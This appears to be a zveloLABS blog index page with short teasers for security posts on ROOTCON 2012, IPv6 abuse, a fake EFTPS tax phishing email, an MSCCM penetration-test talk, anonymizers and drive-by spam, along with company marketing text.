This is the second and final recap of the ROOTCON 2012 annual hacker conference and information security gathering, which zveloLABS had the opportunity of attending. Following are additional highlights that deserve to be shared instead of being tucked away in my personal notebook.
The threat landscape continues to evolve—individual and state-backed hackers and agencies become increasingly emboldened to compromise websites and servers, steal CPU cycles for cryptocurrency mining, embark on social engineering efforts to find backdoors, and sway public opinion through fake news and other measures. zvelo provides the most advanced URL/IP categorization database for web filtering, whitelists and blacklists, and residential and business protections against bad actors and malicious online behavior. Explore zvelo’s Cybersecurity and threat intelligence data feeds for industry leading malicious and phishing exploit detection and the most advanced cyber threat intelligence available to OEMs and device manufacturers.
zveloLABS® recently had the opportunity to attend ROOTCON 2012, an annual hacker conference and information security gathering, that was held in Cebu City, Philippines. The organizer line-up was interesting and quite varied. Attendees came from government, private and academic sectors. Following is part one of two recaps about this insightful event.
Malware authors are quickly exploiting the vulnerabilities of IPv6 as more and more websites support the new communications protocol. Nefarious IPv6 tools exist that can be used for malicious online activity, even if the tools are intended to facilitate communication between the IPv6 and IPv4 protocols
zveloLABS detected a suspicious-looking email purporting to come from the Electronic Federal Tax Payment System (EFTPS) of the U.S. Treasury Department. This email is fraudulent and claims that “Your Federal Tax Payment ID has been rejected.” The payment rejection is falsely attributed to the use of an invalid identification number. Here is an example of the actual phishing email (see image 01), followed by some observations that should raise red flags about its validity.
At DEF CON 2012 in Las Vegas I sat through a presentation titled “Owning One to Rule them All,” hosted by penetration testers Dave Kennedy and Dave DeSimone. They discussed a recent penetration test that utilized Microsoft Systems Center Configuration Manager (MSCCM) to gain access to essentially an entire network of computers. MSCCM is intended to streamline the management of multiple devices – desktops, laptops, smartphones and tablets – within IT infrastructures. While a tool like MSCCM may seem convenient, granting too many administrative features can lead to more serious network security headaches, including breaches.
Imagine for a second you were presented with a superhuman baby having the ability to learn and retain vast amounts of information. We’ll make it a girl super baby as a tribute to fem-heroes of comic book past. Now, what if on your shoulders lays the opportunity to raise her up and teach her the sum of all human knowledge that ever existed? Like every good mentor, you watch her closely making sure her misunderstandings and confusions are always kept checked, corrected, and resolved. You take pride in how accurate she becomes and are quick to reply “Bring it!” to anyone who wants to test her knowledge. Here at zvelo this what-if situation is a reality and I’d like to share with you the experience of training and working with an intelligent being day after day.
The recent crackdown on well-known Torrent services, aided by Internet Service Providers, has led to the increasing use of anonymizers. As the name implies, anonymizers allow for anonymous web browsing and are used by end users to bypass restrictions or blocks to web content. Anonymizers are proxy services, or “proxies,” that receive and execute web requests on behalf of the user, making online activity untraceable. It is the untraceable aspect of anonymizers that has caught the attention of the underground community.
”Drive by” spam attacks are a growing business network security risk, affecting those who open emails containing a malicious script that downloads malware to the user’s PC that ultimately infects the company’s network. These emails don’t always include an attachment. Some HTML-based varieties are reported to be activated with the mere opening of an email and nothing more.
zveloLABS™ reported live from the 2011 Hack in the Box Security Conference (HITBSecConf) in Malaysia. Following are additional reflections about the conference and other highlights worth mentioning.
In mid-September of 2011, I had the privilege of attending a SOPHOS seminar titled, “Anatomy of an Attack – How Hackers Threaten your Security,” hosted by Chester Wisniewski, a highly regarded Senior Security Advisor and frequent contributor to the award-winning Naked Security blog.